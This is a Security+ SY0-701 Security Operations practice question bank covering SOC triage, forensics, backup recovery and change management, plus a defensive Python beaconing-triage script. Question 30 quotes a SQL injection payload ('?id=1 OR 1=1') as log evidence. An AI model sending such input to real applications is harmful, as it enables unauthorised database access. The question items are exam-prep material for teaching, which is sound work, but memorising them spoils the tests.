Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


SY0-701 Security Operations • Complete Question Bank

SY0-701 Security Operations — All Questions With Answers

Complete SY0-701 Security Operations question bank — all 0 questions with answers and detailed explanations.

291 questions
Question 1 (medium, multiple choice)

A SOC analyst receives an alert from the EDR system indicating that the process 'C:\Program Files\Vendor\Updater.exe' attempted to modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key on a user's workstation. The analyst checks the file hash and finds it matches a known legitimate software updater. Which of the following actions is most appropriate for the analyst to take?

Question 2 (medium, multiple choice)

A SOC analyst is reviewing logs from a Windows domain controller and notices a large number of failed logon attempts (Event ID 4625) from a single source IP address within a five-minute window. The account names used are random strings such as "a1b2c3", "x9y8z7", etc. The analyst then checks the source IP and finds it is a known external address from a foreign country. Which of the following is the most appropriate next step for the analyst to take?

Question 3 (medium, multiple choice)

A security operations analyst is tuning a SIEM correlation rule designed to detect brute-force password attacks against domain user accounts. The current rule generates an alert when a single user account has more than 10 failed logon attempts within a 5-minute window. The SOC team is overwhelmed by thousands of alerts each day, the vast majority of which are triggered by legitimate users who accidentally mistype their passwords. Which of the following modifications to the rule would most effectively reduce false positives while still detecting actual brute-force attacks?

Question 4 (medium, multiple choice)

A security analyst is responding to a potential ransomware incident on a Windows server that is still running. The analyst needs to preserve forensic evidence for analysis. Which of the following actions should the analyst perform first, based on the order of volatility?

Question 5 (medium, multiple choice)

A security analyst is monitoring logs from the cloud access security broker (CASB) and observes that a user account downloaded 500 GB of data from a highly sensitive SharePoint document library within a single hour. The user's historical baseline shows an average daily download of less than 10 MB. Additionally, the log shows the session originated from an IP address in a country where the company has no employees or business operations. Which of the following actions is the most appropriate for the analyst to take?

Question 6 (medium, multiple choice)

A security analyst in the SOC is investigating a potential DNS tunneling incident. The analyst has identified a workstation that is making thousands of DNS queries to an external domain with base64-encoded subdomains. The analyst suspects that sensitive files from the workstation are being exfiltrated by encoding their contents into the subdomains of the DNS queries. Which of the following log sources will provide the most definitive evidence to confirm that the contents of a specific sensitive file are being transmitted in the DNS queries?

Question 7 (medium, multiple choice)

A security analyst is reviewing network flow logs and notices a series of outbound connections from a single internal workstation to an external IP address on TCP port 443. The connections occur every 5 minutes, each lasting about 2 seconds, and the amount of data transferred per connection is consistently around 1 KB. The workstation's user reports no unusual activity. The analyst checks the host's EDR logs and sees no malicious processes or known indicators. Which type of activity is this pattern most consistent with?

Question 8 (medium, multiple choice)

A security analyst in the SOC is reviewing an alert from the corporate VPN server. The alert indicates that user 'jsmith' authenticated successfully from an IP address in Brazil at 14:30 UTC. The analyst contacts jsmith, who confirms he is physically in the company's headquarters in Chicago and has not remotely accessed the VPN today. The VPN authentication logs show that jsmith's session used a valid smart card certificate for authentication. The analyst checks the certificate revocation list and finds that jsmith's certificate has not been revoked. Which of the following is the most likely explanation for this event?

Question 9 (medium, multiple choice)

A security analyst is reviewing the perimeter firewall logs. The analyst observes repeated TCP SYN packets from a single external IP address (203.0.113.50) to multiple internal IP addresses on TCP port 3389. The packets are sent with a consistent 50-millisecond interval. There are no subsequent SYN-ACK or RST packets from the internal hosts in the logs. The analyst suspects this is a reconnaissance scan. Which of the following additional log sources would provide the most definitive evidence to confirm this suspicion?

Question 10 (medium, multiple choice)

A digital forensics analyst is investigating a suspected insider threat. The analyst has acquired a laptop used by the suspect. The analyst needs to obtain a forensic image of the hard drive without altering any data. The laptop is running and logged into the suspect's user account. Which of the following is the most appropriate first step for the analyst to take?

Question 11 (medium, multiple choice)

A security analyst receives an alert from the intrusion detection system indicating that a workstation in the finance department has established an outbound connection to a known malicious IP address using an encrypted protocol. The analyst verifies the alert and checks the user's activity logs, which show no legitimate business reason for the connection. According to the incident response process, what should the analyst do NEXT?

Question 12 (medium, multiple choice)

A security analyst at a financial firm detects an unusual spike in outbound network traffic from a database server that normally only communicates with internal web servers. The traffic is directed to numerous external IP addresses in various countries. According to established incident response procedures, what should be the analyst's immediate next step?

Question 13 (medium, multiple choice)

A security analyst receives an alert from the intrusion detection system (IDS) indicating a high volume of outbound traffic from a single internal workstation to an external IP address known to be associated with a command-and-control (C2) server. The workstation's user reports no unusual activity. Which of the following should the analyst do FIRST?

Question 14 (medium, multiple choice)

A security analyst notices repeated failed login attempts to a critical database server from a single external IP address over the past hour. The analyst reviews the authentication logs and sees that the account name used in each attempt is 'admin'. Which of the following security controls should the analyst recommend to mitigate this type of attack with minimal impact on legitimate users?

Question 15 (medium, multiple choice)

A security analyst receives multiple alerts indicating that several users in the finance department clicked a malicious link in an email. The analyst has confirmed the email subject line and sender address. Which of the following is the BEST first step to contain the incident?

Question 16 (medium, multiple choice)

A security analyst receives an automated alert indicating that a standard user account logged in from a geographic location that is unusual for the user, and the login occurred at 3:00 AM local time. The analyst has not yet verified whether this was a successful login or if any additional suspicious activity occurred. According to standard incident response procedures, what should the analyst do NEXT?

Question 17 (medium, multiple choice)

A security analyst detects unusual outbound traffic from a workstation that appears to be communicating with a known malicious IP address. The analyst immediately isolates the workstation from the network. Which of the following is the NEXT step in the incident response process according to NIST SP 800-61?

Question 18 (medium, multiple choice)

An organization's file server contains sensitive HR data. The security team discovers that permissions on a confidential folder have been altered. Which of the following security controls would MOST likely help determine the account responsible for this change?

Question 19 (medium, multiple choice)

A security analyst detects a high volume of failed authentication attempts from IP address 203.0.113.1 against a web application. The attempts use different usernames, such as 'admin', 'root', 'test', and several common names. Account lockout policies are configured to lock an account after five failed attempts. Despite this, the analyst sees the attempts continuing over several hours. Which of the following security controls is most likely missing or improperly configured?

Question 20 (medium, multiple choice)

A security analyst receives an alert about a user account that has been attempting to authenticate from an unusual geographic location outside of business hours. The analyst reviews the event logs and sees that the authentication attempt was successful, but the user has not reported any suspicious activity. Which of the following actions should the analyst take NEXT?

Question 21 (medium, multiple choice)

A help desk technician reports that a user's account was locked out three times overnight. The security team reviews the authentication logs and discovers that the lockouts resulted from failed login attempts originating from a single external IP address, each attempt using a slightly different variation of the user's password. Which of the following should the security analyst do FIRST?

Question 22 (medium, multiple choice)

A security analyst detects an encrypted outbound connection from a web server to an unknown IP address. The connection is persistent and occurs every 5 minutes. What is the MOST appropriate first step for the analyst to take?

Question 23 (medium, multiple choice)

A security analyst in the SOC observes a sudden spike in failed authentication attempts from a single external IP address targeting multiple user accounts over the last 30 minutes. After confirming the logs are accurate, which of the following actions should the analyst take FIRST according to standard incident response procedures?

Question 24 (medium, multiple choice)

A security analyst detects repeated outbound traffic from a single workstation to an IP address listed on a public threat intelligence feed as a known command-and-control server. The user reports that the workstation is behaving slowly and that antivirus software is up to date. According to incident response best practices, what should the analyst do FIRST?

Question 25 (medium, multiple choice)

A SOC analyst is investigating an alert triggered when a user clicked a link in an email. The email appeared to be from a trusted vendor and included a PDF attachment with a macro, but the user did not run the macro. Upon reviewing the email headers, the analyst notices that the sender's domain is a common misspelling of the vendor's legitimate domain. Which of the following is the most direct indicator that this email is a phishing attempt?

Question 26 (medium, multiple choice)

A security analyst in a SOC receives an alert indicating that a large volume of data was transferred from a user's workstation to an external IP address at 2:00 AM. The analyst suspects a data exfiltration attack. According to incident response best practices, what should the analyst do FIRST?

Question 27 (medium, multiple choice)

A security analyst receives an alert that a user clicked a link in a phishing email and entered their corporate credentials on a fake login page. Which of the following should the analyst do FIRST to minimize further damage?

Question 28 (medium, multiple choice)

A security analyst notices a sudden increase in outbound traffic from a database server that normally only communicates with internal application servers. The server is running a standard OS with no recent changes. Which of the following actions should the analyst take FIRST to determine if the server is compromised?

Question 29 (medium, multiple choice)

A security analyst is reviewing authentication logs from a corporate web application. The logs show that over a span of two hours, a single external IP address attempted to log in with 500 different usernames, each using the same password 'Spring2024!'. Only a few of these attempts succeeded. Which type of attack is most likely being observed?

Question 30 (medium, multiple choice)

A security analyst is reviewing web server logs after a user reports that the company website displayed an error message containing raw database queries. The log shows repeated requests to the product search page with the following parameter: `?id=1 OR 1=1`. Which of the following should the analyst do FIRST to confirm the nature of the suspected attack?

Question 31 (medium, multiple choice)

A security analyst detects real-time data exfiltration from a critical production database that supports customer transactions. The exfiltration appears to be occurring via a compromised application service account. Which containment strategy should the analyst implement FIRST to minimize damage while preserving forensic data?

Question 32 (medium, multiple choice)

A security analyst receives an alert that a user's workstation is communicating with a known malicious IP address during off-hours. The analyst reviews the firewall logs and confirms the connection was established. Which of the following should the analyst perform NEXT to contain the threat?

Question 33 (medium, multiple choice)

A security analyst observes a pattern where an account exhibits multiple failed login attempts from an IP address in a foreign country, followed by a successful login from the same account but from a different IP address in another foreign country minutes later. The analyst wants to deploy a control that can automatically detect and alert on this type of anomalous user behavior, even if the individual login events are not blocked by existing rules. Which of the following security controls is BEST suited for this task?

Question 34 (medium, multiple choice)

A security analyst notices that a phishing campaign is targeting employees with emails that appear to be from the company's IT support team. The emails contain a link to a website that mimics the corporate password reset portal. Which of the following controls would be MOST effective in preventing users from reaching the malicious website, assuming the link uses HTTPS?

Question 35 (medium, multiple choice)

A security analyst notices repeated attempts to copy large amounts of data to USB drives from a user's workstation. The analyst suspects the user may be exfiltrating company proprietary data. The company wants to implement a technical control that can both detect and block such data exfiltration without completely disabling all USB ports, as some users require USB for authorized work. Which of the following would best meet this requirement?

Question 36 (medium, multiple choice)

A security analyst detects that multiple workstations in the finance department are displaying ransom notes and files are being encrypted. The analyst has disconnected the affected workstations from the network. Which of the following should the analyst do next according to the incident response procedure?

Question 37 (medium, multiple choice)

A security analyst observes a critical server generating unusually high outbound traffic to an external IP address that is listed on a threat intelligence feed as a known command-and-control server. The analyst suspects the server is compromised. According to standard incident response procedures, what should the analyst do NEXT?

Question 38 (medium, multiple choice)

A security analyst at a financial firm notices a significant increase in DNS queries from an internal server to a rarely visited external domain. The queries are for unusual subdomain names that contain encoded data. The server is not a DNS server and does not typically generate outbound traffic. Which of the following is the MOST appropriate immediate action for the analyst to take?

Question 39 (hard, multiple choice)

A security analyst is reviewing firewall logs and notices repeated connection attempts from a single external IP address to multiple internal IP addresses on TCP port 22 (SSH). Each attempt uses a different username but the same password: 'Spring2024!'. The attempts occur sporadically over a 12-hour period. Which type of attack is most likely being observed?

Question 40 (medium, multiple choice)

A SOC analyst detects that a user's workstation is sending large volumes of data to an unusual external IP address during non-business hours. The analyst has already isolated the workstation by disconnecting it from the network. What is the NEXT step in the incident response process?

Question 41 (medium, multiple choice)

A security analyst is reviewing authentication logs and observes multiple failed login attempts for a single user account occurring within a short timeframe, followed by a successful login from an IP address located in a country where the user has never traveled. The failed attempts originate from various IP addresses and use different passwords. Which type of attack has most likely occurred?

Question 42 (medium, multiple choice)

A security analyst notices unusual outbound traffic from a server that normally only communicates with internal clients. The traffic is encrypted and goes to an external IP address not on any blocklists. The analyst also finds a new scheduled task on the server that runs a PowerShell script. Which of the following best describes the analyst's immediate next step in the incident response process?

Question 43 (medium, multiple choice)

A security analyst at a manufacturing company notices multiple workstations generating high volumes of encrypted outbound traffic and displaying ransom notes. The analyst suspects a ransomware outbreak. According to the incident response process, which of the following should the analyst perform FIRST?

Question 44 (medium, multiple choice)

A security analyst detects unusual outbound traffic from a workstation to an external IP address known for command and control. The analyst has verified the alert and wants to contain the threat. According to the NIST SP 800-61 incident response process, which of the following steps should the analyst take FIRST?

Question 45 (medium, multiple choice)

During malware response on a finance workstation, the system is still powered on and connected. The manager asks whether you can just reboot it to stop the issue. What is the best next step?

Question 46 (medium, multiple choice)

A privileged account is used on a jump box at 02:15, and the SIEM shows multiple interactive logons from the same account to different servers within 10 minutes. The administrator says they used a password vault for the session. Which log source best confirms whether the access was authorized?

Question 47 (medium, multiple choice)

After confirming malicious activity on a workstation, the incident lead wants the system cleaned up quickly. The analyst has not yet collected any volatile data. What should the analyst do before remediation begins?

Question 48 (medium, multiple choice)

After restoring a virtualized file server from backup, users can log in but the accounting application returns database consistency errors. What should you do next?

Question 49 (medium, multiple choice)

A web application was updated at 10:00. At 10:05, the SIEM reports a sharp rise in HTTP 500 errors and WAF blocks from the same source range. The application owner says customers are seeing failures only on the new checkout page. What is the best next step?

Question 50 (medium, multi-select)

EDR flags a word processor that launched encoded PowerShell and then made an outbound HTTPS connection to a rare domain. Which two actions should the analyst take first from the EDR console? Select two.

Question 51 (medium, multiple choice)

Security receives a company laptop used in an insider theft investigation. A manager wants the device moved to another office for review by legal staff. Which action best supports chain of custody?

Question 52 (medium, multiple choice)

After restoring a virtual file server from last night’s backup, users can browse shares, but finance reports that several spreadsheet edits from yesterday are missing. What should the administrator verify next before declaring the restore successful?

Question 53 (medium, multi-select)

A firewall rule was changed in production to allow a new vendor IP range, and payroll users immediately lost access to an internal service. Which two change-management practices would have reduced the risk of this outage? Select two.

Question 54 (easy, multiple choice)

An investigator needs a copy of a suspect laptop drive for analysis without changing the original media. What should be used?

Question 55 (medium, multi-select)

A SIEM alert shows five failed logins to a SaaS admin portal from one IP, followed by a successful login from a new city three minutes later. Which two actions are the best next steps for the analyst to validate the event before containment? Select two.

Question 56 (easy, multiple choice)

A workstation is suspected of malware infection, and it is still powered on and connected to the network. Which action best preserves volatile evidence before the system is shut down?

Question 57 (medium, multi-select)

After restoring a virtual file server from backup, users can log in and browse shares, but finance says the last day's edits are missing. Which two steps should the administrator take before declaring recovery complete? Select two.

Question 58 (medium, multiple choice)

A firewall ACL must be modified in production to allow a vendor update server. The team wants to minimize the chance of accidentally blocking payroll traffic. Which change-management step is best before applying the rule?

Question 59 (medium, multi-select)

A Windows server is still running after suspected compromise. Before it is powered down, which two volatile data sources should be collected first? Select two.

Question 60 (medium, multi-select)

A company-owned laptop is being transferred from the incident site to the evidence locker for a theft investigation. Which two actions best support chain of custody during transport? Select two.

Question 61 (medium, multiple choice)

After restoring a virtual file server from backup, users can browse folders, but an accounting application reports missing recent transactions. What should the administrator do next?

Question 62 (medium, multi-select)

A firewall rule was added directly in production to allow a new vendor IP range, and an internal service stopped responding because the new rule was placed above an existing deny rule. Which two change-management practices would have reduced the risk? Select two.

Question 63 (medium, multiple choice)

An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?

Question 64 (medium, multiple choice)

An administrator pushed a firewall rule change to allow a new vendor IP range during business hours. Minutes later, payroll users lost access to an internal service. Which change management practice would have best reduced the impact?

Question 65 (easy, multiple choice)

A SIEM alert shows five failed logins to an administrator account, followed by a successful login from a new city three minutes later. The account owner says they did not sign in. What should the analyst do first?

Question 66 (hard, multi-select)

A privileged cloud administrator account shows two suspicious events: an API key was created from an unfamiliar IP address, and a mailbox forwarding rule was added five minutes later. The account is still active and may be in attacker control. Which two actions should the analyst take first to preserve evidence while limiting additional abuse? Select two.

Question 67 (medium, multiple choice)

You are handed a company laptop suspected in an insider theft case. Legal says the evidence may be needed in court. Which action best preserves admissibility?

Question 68 (hard, multi-select)

A virtual file server was restored from last night’s backup. The service is online, but some finance users report missing spreadsheet changes and a few files show a 'recovered copy' timestamp. Which two checks should be completed before the team accepts the restore as successful? Select two.

Question 69 (medium, multiple choice)

After a new MFA policy rollout, the SIEM generates an alert for five failed logins to a SaaS admin portal from one IP, followed by a successful login to the same account from an IP in another country. The account owner says they were in meetings all day. What should the analyst do first?

Question 70 (medium, multiple choice)

A firewall rule change was implemented directly in production to allow a new vendor IP range. Within minutes, several internal services became unreachable because the rule order changed unexpectedly. Which change-management practice would have most likely prevented this outage?

Question 71 (medium, multiple choice)

A finance laptop is powered on, the user is still logged in, and it remains connected to Wi-Fi after a malware alert. What should the responder do first to preserve volatile evidence?

Question 72 (easy, multiple choice)

A laptop is suspected of being used in a malware incident. It is still powered on and connected to Wi-Fi. What should the responder do before shutting it down?

Question 73 (easy, multiple choice)

A Linux server starts showing many failed SSH logins from one source IP address. Which log source should the analyst review first?

Question 74 (medium, multiple choice)

EDR alerts on a remote laptop show a suspicious process attempting to dump browser credentials and then contacting a rare domain. The user is in another time zone and still needs the laptop online for a presentation later today. What containment action is best?

Question 75 (hard, multi-select)

A server is suspected of being used for lateral movement after the SOC notices dozens of failed SSH logons, then a successful login from a new source IP, followed by new outbound SMB connections to internal hosts. The system is still running. Which two items should be collected first before any reboot or remediation? Select two.

Question 76 (medium, multiple choice)

Security receives a company-owned laptop connected to an insider theft investigation. Before the device is transported to the evidence locker, what is the BEST action to support chain of custody?

Question 77 (hard, multi-select)

An investigator receives a suspect laptop that may be needed in court. The goal is to create a forensic image without changing the original drive contents. Which three actions best support chain of custody and evidence integrity? Select three.

Question 78 (hard, multi select)

A SIEM correlation rule fires for a Microsoft 365 executive mailbox. At 02:14, the account signs in from a new country. At 02:17, the mailbox gets a forwarding rule that sends all mail to an external address. The user says they did not travel and did not create any rules. Which two log sources should the analyst review first to confirm whether this is account takeover or token abuse? Select two.

Question 79 (medium, multi select)

A finance workstation is suspected of running malware. It is still powered on, the user is logged in, and the network cable is connected. Which two actions best preserve volatile evidence before shutdown? Select two.

Question 80 (medium, multiple choice)

A vulnerability scan identifies a critical patch for a fleet of internet-facing servers. The operations lead wants to apply it immediately during peak business hours because the exploit is public. What is the BEST next step?

Question 81 (medium, multiple choice)

A SIEM alert shows a successful VPN login for an executive account from an unusual country, followed 3 minutes later by large downloads from a file share the user rarely accesses. Which log source should the analyst review next to determine whether the session came from the user's assigned laptop or an unmanaged device?

Question 82 (medium, multiple choice)

EDR detects encoded PowerShell launched from a word processor, a process attempt to read LSASS memory, and an outbound HTTPS connection to a rare domain. What should the analyst do first?

Question 83 (hard, multi select)

EDR on a finance workstation shows Outlook launching mshta.exe, followed by a scheduled task named UpdateSvc_91 and repeated HTTPS beacons to a newly registered domain. The user is still working and has not rebooted. Which two telemetry sources would best help the analyst confirm the initial execution path and determine whether the host has communicated with other suspicious infrastructure? Select two.

Question 84 (medium, multiple choice)

EDR flags a workstation after a word processor launches encoded PowerShell and the host begins contacting a rare domain over HTTPS. The user is still active. What is the best containment action from the EDR console?

Question 85 (medium, multi select)

An EDR alert shows suspicious PowerShell activity on a remote employee laptop, and the user is still logged in to cloud applications. Which two response actions are best if the device is believed to be actively compromised? Select two.

Question 86 (medium, multiple choice)

A SIEM correlates three failed MFA prompts for a payroll admin account from one IP, a successful login two minutes later from the same IP, and a new mailbox forwarding rule to an external address. What is the best immediate action?

Question 87 (easy, multiple choice)

An administrator wants to add a new vendor IP range to a firewall rule in production. What is the best change-management step to reduce risk?

Question 88 (medium, multiple choice)

During malware containment, an analyst needs to preserve transient information from a compromised Windows workstation that is still running. Which action is MOST appropriate before shutdown or imaging?

Question 89 (medium, multi select)

A SIEM alert shows a successful sign-in to a cloud admin portal from an unusual country, followed by mailbox forwarding-rule changes four minutes later. Which two log sources should the analyst review first to confirm whether the account was abused? Select two.

Question 90 (hard, multi select)

EDR reports that a workstation launched PowerShell from a word processor, created a scheduled task named WinUpdateSvc, and began making repeated HTTPS connections to a rare external domain. The user is still logged in to several cloud apps. Which two response actions are best to initiate from the EDR console? Select two.

Question 91 (medium, multi select)

An investigator needs to make a forensic image of a suspect laptop without changing the original drive contents. Which two practices should be used? Select two.

Question 92 (medium, multiple choice)

An employee reports a ransomware note on a file server. The server is still powered on, shares are still being accessed, and management wants service restored as quickly as possible. What should the incident response team do first?

Question 93 (hard, multi select)

A Windows laptop is believed to be involved in a credential-theft incident. It is still powered on, connected to Wi-Fi, and the user reports that the screen recently locked by itself. The SOC can reach the device remotely through EDR. Which two actions should be taken before the laptop is shut down? Select two.

Question 94 (medium, multiple choice)

Several Windows servers were built from the same image, and all of them use the same local Administrator password. What is the best operational hardening change?

Question 95 (easy, multiple choice)

EDR flags a workstation because a word processor launched an unusual script and then contacted a rare external domain. What is the best immediate action?

Question 96 (easy, multiple choice)

During a disaster recovery test, what is the most important thing to confirm about the backup?

Question 97 (medium, multiple choice)

A SIEM reports a successful sign-in to a SaaS admin portal from a new country, followed three minutes later by multiple configuration changes to mailbox forwarding rules. The account owner says they were in the office and did not approve any changes. What should the analyst check next?

Question 98 (medium, multiple choice)

A SIEM alert flags an interactive logon to a Windows file server from a service account that normally only runs scheduled tasks. The alert occurred at 01:12, but the maintenance window for that server is every Sunday at 02:00. The account also accessed a different server five minutes later. What should the analyst do first?

Question 99 (medium, multiple choice)

EDR flags encoded PowerShell launched by a spreadsheet application, followed by an attempt to access LSASS and outbound HTTPS traffic to a rare domain. What should the analyst do first from the EDR console?

Question 100 (easy, multiple choice)

A firewall rule must be changed to allow a vendor update server. Which step best reduces the chance of an unexpected outage?

Question 101 (medium, multi select)

A company-owned laptop is suspected in an insider theft case and legal says the evidence may be used in court. Which two actions best support evidence admissibility during transport to the evidence locker? Select two.

Question 102 (easy, multiple choice)

A new SIEM rule generates many alerts from a scheduled backup job that is known to be legitimate. What should the analyst do to improve alert quality?

Question 103 (easy, multiple choice)

A company laptop is collected as evidence in a suspected theft case. Which action best supports chain of custody?

Question 104 (medium, multi select)

EDR flags encoded PowerShell launched by a spreadsheet application and an outbound HTTPS connection to a rare domain. Which two response actions are best to take from the EDR console first? Select two.

Question 105 (medium, multi select)

After restoring a virtual file server from backup, users can open shares, but the accounting application shows the previous day's transactions are missing. Which two steps should the administrator take next? Select two.

Question 106 (easy, multiple choice)

After a file server is restored from backup, users can open the share, but the business wants to be sure the recovery was successful. What should the administrator verify next?

Question 107 (medium, multiple choice)

An employee reports a ransomware note on a finance laptop. The laptop is still powered on, connected to Wi-Fi, and the user says they were just working in a spreadsheet. Management wants the fastest safe response that also preserves evidence. What should the responder do first?

Question 108 (easy, multiple choice)

EDR shows encoded PowerShell launched by a word processor and an outbound connection to a rare domain. What is the best immediate containment action?

Question 109 (medium, multi select)

A new SIEM rule generates hundreds of alerts from a scheduled backup job that is known to be legitimate. Which two tuning changes are the best ways to reduce noise without losing visibility into real abuse? Select two.

Question 110 (easy, multiple choice)

A SIEM alert shows a payroll administrator account signed in at 02:10 from a country the employee has never visited. The employee says they are on vacation at home and did not travel. What should the analyst do first?

Question 111 (medium, multiple choice)

Based on the exhibit, which improvement best aligns the current backup design with the stated recovery targets?

Exhibit

Disaster recovery review for the customer billing platform

Current backup design:
- Full backup once per day at 23:00
- Backups stored on the same storage cluster as production VM snapshots
- Backup administrator account is shared by the operations team
- Restore test cadence: none in the last 12 months
- Current measured restore time from bare metal: 7 hours

Business recovery targets:
- RTO: 2 hours
- RPO: 15 minutes

Question 112 (hard, multiple choice)

Based on the exhibit, what is the most likely SOC conclusion and next action?

A scheduled alert fired on a server that repeatedly connects to a vendor update site at fixed intervals. The security team wants to know whether the alert represents a real threat or a harmless operational pattern.

Exhibit

10:00:02 patch-srv-12  service 'AcmePatchAgent' started by NT AUTHORITY\SYSTEM
10:00:05 patch-srv-12  DNS query: updates.acmecorp.com -> 198.51.100.44
10:00:05 patch-srv-12  outbound TLS connection to 198.51.100.44:443
10:00:07 SIEM rule 'possible beaconing every 15 minutes' triggered
10:15:03 patch-srv-12  DNS query: updates.acmecorp.com -> 198.51.100.44
10:15:03 patch-srv-12  outbound TLS connection to 198.51.100.44:443
10:15:04 EDR metadata: process hash matches approved vendor signature
CMDB: Asset group = Patch Management Server; maintenance window = daily 10:00-10:30
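
The exhibit above is the classic case where a beaconing rule fires on traffic that is periodic but expected. The script below is an added example for this page, not Courseiva's code: it reproduces the kind of triage an analyst does by hand, scoring interval regularity alongside the context the exhibit supplies (CMDB role and maintenance window, approved vendor signature, a destination that was resolved from a named vendor host). The patch-srv-12 events are copied from the exhibit; the second host, ws-77, its process name and its destination are constructed here purely to show the opposite verdict.

```python
"""Beaconing triage: score periodic outbound connections against asset context.

Added example for this page, not Courseiva's code. The patch-srv-12 events
mirror the exhibit; ws-77, svchost_update.exe and 203.0.113.9 are constructed
here to show the contrasting outcome.
"""
from datetime import datetime, time

# Constructed log events: (time, host, process, dest_ip, dest_port)
CONNECTIONS = [
    ("10:00:05", "patch-srv-12", "AcmePatchAgent", "198.51.100.44", 443),
    ("10:15:03", "patch-srv-12", "AcmePatchAgent", "198.51.100.44", 443),
    ("02:00:10", "ws-77", "svchost_update.exe", "203.0.113.9", 443),   # constructed contrast
    ("02:15:11", "ws-77", "svchost_update.exe", "203.0.113.9", 443),   # constructed contrast
]
# Constructed context records an analyst would pull from DNS logs, EDR and the CMDB
DNS_ANSWERS = {"198.51.100.44": "updates.acmecorp.com"}   # ws-77's destination was never resolved by name
SIGNED_BY_APPROVED_VENDOR = {"AcmePatchAgent": True}       # EDR signature metadata
CMDB = {
    "patch-srv-12": {"group": "Patch Management Server", "window": (time(10, 0), time(10, 30))},
    "ws-77": {"group": "User Workstation", "window": None},
}

RULE_INTERVAL_S = 15 * 60   # what the SIEM rule 'possible beaconing every 15 minutes' keys on


def _parse(t):
    return datetime.strptime(t, "%H:%M:%S")


def triage_beacon(host, dest_ip, connections=CONNECTIONS):
    """Return the signals an analyst would weigh, plus a verdict.

    Periodicity alone is not evidence of compromise: a patch agent and a C2
    implant both check in on a schedule. What separates them is context: does
    the asset's role explain the traffic, is the process one we trust, did the
    destination come from a named vendor host, and does the timing fit a
    documented window?
    """
    events = [c for c in connections if c[1] == host and c[3] == dest_ip]
    stamps = [_parse(c[0]) for c in events]
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    periodic = bool(gaps) and all(abs(g - RULE_INTERVAL_S) <= 30 for g in gaps)

    asset = CMDB.get(host, {"group": "unknown", "window": None})
    window = asset["window"]
    in_window = window is not None and all(window[0] <= s.time() <= window[1] for s in stamps)

    signals = {
        "periodic": periodic,
        "asset_group": asset["group"],
        "in_maintenance_window": in_window,
        "process_signed_by_approved_vendor": all(SIGNED_BY_APPROVED_VENDOR.get(c[2], False) for c in events),
        "destination_resolved_from_named_host": dest_ip in DNS_ANSWERS,
    }
    benign = (
        signals["in_maintenance_window"]
        and signals["process_signed_by_approved_vendor"]
        and signals["destination_resolved_from_named_host"]
        and "Patch" in signals["asset_group"]
    )
    # Periodicity is what fired the rule; context decides whether it is expected.
    signals["verdict"] = (
        "expected operational pattern: tune the rule for this asset"
        if benign else
        "investigate: periodic traffic with no operational explanation"
    )
    return signals


if __name__ == "__main__":
    for host, ip in (("patch-srv-12", "198.51.100.44"), ("ws-77", "203.0.113.9")):
        print(host, triage_beacon(host, ip))
```

The interval check is deliberately loose (plus or minus 30 seconds): both the patch agent and real malware will drift by a few seconds, so tightening it buys nothing. The checks that actually decide the verdict are the contextual ones, which is why the exhibit includes the CMDB line and the EDR hash match rather than more timestamps.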

Question 113 (medium, multiple choice)

An ERP database is backed up nightly to a NAS that remains online and is managed with the same admin group as production servers. After a ransomware incident, management wants the most effective change to improve recovery assurance without redesigning the whole environment. What should be implemented?

Question 114 (medium, multiple choice)

An internal finance application has an RTO of 2 hours and an RPO of 30 minutes. Current backups restore in about 6 hours because the team must rebuild the server from scratch. Which change best aligns the recovery design to the business requirement?

Question 115 (medium, multiple choice)

During morning SIEM review, an analyst sees 37 failed SSH logins followed by a successful login to a Linux server from a jump host. The account belongs to a configuration-management service account, and the activity occurred inside the normal maintenance window. What should the analyst do next to determine whether the alert is a true positive or a false positive?

Question 116 (medium, multi select)

After isolating an infected endpoint and collecting volatile memory, the team identifies a malicious browser extension and a scheduled task used for persistence. Which two actions belong in the eradication phase before returning the system to service? Select two.

Question 117 (medium, multiple choice)

A monthly scan finds a critical remote-code-execution vulnerability on an internet-facing VPN appliance. The vendor has not released a patch for six weeks, but the service must stay online. Which short-term action is the best risk treatment?

Question 118 (medium, multiple choice)

A billing application has an RTO of 2 hours and an RPO of 30 minutes. The current recovery method requires rebuilding the VM from scratch and then restoring last night's backup, which takes over six hours. Which solution best meets the stated recovery objectives?

Question 119 (medium, multi select)

A weekly vulnerability scan returns five findings across different systems. Which three should be remediated first? Select three.

Question 120 (medium, multiple choice)

During a restore test, a technician brings back a file server successfully, but the application team discovers that the database is missing the last 12 hours of transactions. Management says the business can tolerate only one hour of data loss. What should be changed first?

Question 121 (medium, multiple choice)

A help desk ticket confirms that a user entered corporate credentials into a fake sign-in page. Minutes later, the security team finds a new mailbox forwarding rule and evidence that the attacker added backup MFA codes. After disabling the account, what should the team do next to support containment and recovery?

Question 122 (hard, multiple choice)

Based on the exhibit, which temporary control best reduces risk until the patch is released?

Exhibit

Server: HR-APP02
Finding: Outdated OpenSSL library with a critical remotely exploitable weakness
Vendor status: Fix unavailable for 21 days
Exposure: The service must remain online
Current access: host firewall allows TCP 443 from any source
Monitoring: Monthly vulnerability scans only
Available controls: reverse proxy, WAF, IP allow lists, jump host for administration

Question 123 (hard, multiple choice)

Based on the exhibit, which change best moves the ERP recovery design toward meeting both recovery targets?

Exhibit

ERP database protection summary:
- Required RTO: 2 hours
- Required RPO: 15 minutes
- Current backup schedule:
  * Full backup every Sunday at 01:00
  * Differential backup daily at 01:00
  * Transaction log backup every 30 minutes
- Estimated restore time from backup media: 90 minutes after media is available
- No standby server exists
- Restore testing occurs once per year

Question 124 (medium, multiple choice)

The SOC has contained a mailbox compromise by resetting the password and revoking active sessions. Investigation shows the attacker created an automatic forwarding rule and added an OAuth consent grant. What should happen next to eradicate the threat?

Question 125 (medium, multiple choice)

Based on the exhibit, which change best helps the company meet its recovery objectives after a ransomware event?

Exhibit

Backup status for the billing application

Current design:
- Nightly full backup at 01:00
- Backup repository: NAS-BACKUP01
- NAS-BACKUP01 is joined to the same Active Directory domain as production servers
- Backup share is mounted over SMB from the production network
